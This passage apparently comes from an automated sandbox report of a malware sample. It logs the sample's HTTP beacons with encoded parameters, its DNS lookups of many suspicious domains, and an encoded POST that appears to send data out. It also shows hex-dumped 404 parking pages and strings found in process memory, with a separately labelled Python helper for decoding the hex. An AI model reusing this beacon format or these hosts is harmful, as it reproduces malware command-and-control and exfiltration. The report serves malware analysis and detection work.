                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /rm91/?Cj=Qhv8RTO8YPvh6L30&lH=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--fhq1c541j0zr.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--matfrmn-jxa4m.se
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.anuts.top
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /ei85/?lH=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.telwisey.info
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.sandranoll.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.gipsytroya.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /lfkn/?lH=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.dmtxwuatbz.cc
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: www.hprlz.cz
            Source: global traffic | DNS traffic detected: DNS query: www.catherineviskadi.com
            Source: global traffic | DNS traffic detected: DNS query: www.hatercoin.online
            Source: global traffic | DNS traffic detected: DNS query: www.fourgrouw.cfd
            Source: global traffic | DNS traffic detected: DNS query: www.bfiworkerscomp.com
            Source: global traffic | DNS traffic detected: DNS query: www.tinmapco.com
            Source: global traffic | DNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
            Source: global traffic | DNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global traffic | DNS traffic detected: DNS query: www.anuts.top
            Source: global traffic | DNS traffic detected: DNS query: www.telwisey.info
            Source: global traffic | DNS traffic detected: DNS query: www.sandranoll.com
            Source: global traffic | DNS traffic detected: DNS query: www.gipsytroya.com
            Source: global traffic | DNS traffic detected: DNS query: www.helpers-lion.online
            Source: global traffic | DNS traffic detected: DNS query: www.dmtxwuatbz.cc
            Source: unknown | HTTP traffic detected:
                POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: [hex dump omitted; identical to the Data Ascii body below]
                Data Ascii: lH=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:45 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw / Data Ascii: [gzip-compressed chunked body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:48 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw / Data Ascii: [gzip-compressed chunked body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:50 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw / Data Ascii: [gzip-compressed chunked body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 626
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:53 GMT
                Server: Apache
                Data Raw: [hex dump omitted; identical to the Data Ascii body below]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:35:28 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: [hex dump omitted; identical to the Data Ascii body below]
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:35:39 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: [hex dump omitted; identical to the Data Ascii body below]
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:51 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: [truncated hex dump of the HTML body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:53 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: [truncated hex dump of the HTML body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:56 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: [truncated hex dump of the HTML body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:58 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Raw: [truncated hex dump of the HTML body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:29:04 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: [truncated hex dump of the chunked HTML body omitted]
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:29:07 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: [truncated hex dump of the chunked HTML body omitted]
22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 19 Aug 2024 02:29:09 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 39 63 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 
5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 19 Aug 2024 02:29:12 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 
22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
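            The report stores each of the four 404 responses above as space-separated hex of a chunked HTTP/1.1 body, so the chunk-size lines (2c4, a8d, 49a, ca, c9c) sit in the middle of the HTML and every capture stops before the terminating 0-chunk. The Python below is an added example, not part of the Joe Sandbox report: it converts such a Data Raw field back into text, strips the chunked transfer encoding while tolerating the truncation, and pulls out the page title. The sample input is constructed here to mirror the 02:29:04 response (a chunk boundary right after the <h1>, capture cut off inside the German paragraph); it is not the report's exact bytes.

```python
"""Decode a Joe Sandbox "Data Raw" field: space-separated hex of a chunked HTTP/1.1 body."""
import re
from html import unescape

# Constructed sample modelled on the 02:29:04 response above (not the report's exact bytes):
# the first chunk ends right after "<h1>", the second is cut off inside the German paragraph,
# which is where the report's own capture stops.
PAGE_CHUNKS = (
    b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">\n'
    b'<html lang="en"><head>\n'
    b'    <title>Domain www.sandranoll.com is registered by Domaintechnik\xc2\xae</title>\n'
    b'</head>\n<body>\n    <div id="content">\n        <h1>',
    b'The Domain www.sandranoll.com is registered!</h1>\n'
    b'        <p class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online ver',
)


def chunked(*chunks: bytes) -> bytes:
    """Apply HTTP/1.1 chunked transfer encoding. No terminating 0-chunk is added,
    because none of the captured responses above reaches it."""
    return b"".join(b"%x\r\n" % len(c) + c + b"\r\n" for c in chunks)


SAMPLE_RAW = chunked(*PAGE_CHUNKS)[:-40]   # drop the tail: the capture stops mid-chunk
SAMPLE_HEX = SAMPLE_RAW.hex(" ")           # same "32 63 34 0d 0a ..." layout as Data Raw


def dechunk(data: bytes):
    """Undo chunked transfer encoding.

    Returns (body, chunk_sizes, complete). A capture that ends mid-chunk, as the
    report's does, yields the bytes seen so far with complete=False instead of raising.
    """
    body, sizes, pos = bytearray(), [], 0
    while True:
        end = data.find(b"\r\n", pos)
        if end == -1:
            return bytes(body), sizes, False          # cut off inside a chunk-size line
        size_field = data[pos:end].split(b";", 1)[0].strip()   # ignore chunk extensions
        size = int(size_field, 16)                    # ValueError on a malformed size line
        sizes.append(size)
        if size == 0:
            return bytes(body), sizes, True           # last-chunk reached; trailers ignored
        start = end + 2
        chunk = data[start:start + size]
        body += chunk
        if len(chunk) < size:
            return bytes(body), sizes, False          # cut off inside chunk data
        pos = start + size
        if data[pos:pos + 2] != b"\r\n":
            return bytes(body), sizes, False          # cut off at the chunk's trailing CRLF
        pos += 2


def decode_data_raw(hex_str: str) -> dict:
    """Turn a Data Raw hex string into the de-chunked body text plus the page <title>."""
    body, sizes, complete = dechunk(bytes.fromhex(hex_str))   # fromhex accepts the spaces
    text = body.decode("utf-8", errors="replace")
    m = re.search(r"<title>(.*?)</title>", text, re.I | re.S)
    return {
        "title": unescape(m.group(1).strip()) if m else None,
        "chunk_sizes": sizes,
        "complete": complete,
        "text": text,
    }


if __name__ == "__main__":
    result = decode_data_raw(SAMPLE_HEX)
    print("chunks:", [hex(s) for s in result["chunk_sizes"]], "complete:", result["complete"])
    print("title:", result["title"])
```

            Pasting the real Data Raw string from any of the rows above into decode_data_raw() gives the same parking page; for the 02:29:04 response chunk_sizes comes back as 0x2c4 and 0xa8d, and complete is False for all four because the capture never reaches the 0-chunk.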
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=1
            Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=2
            Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=UjNZQ0VuZmNSTGxudFk1ejYxKzNaQ0FiYW43cEtXaFhmSFFT
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4137645641.000000000564B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dmtxwuatbz.cc
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4137645641.000000000564B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
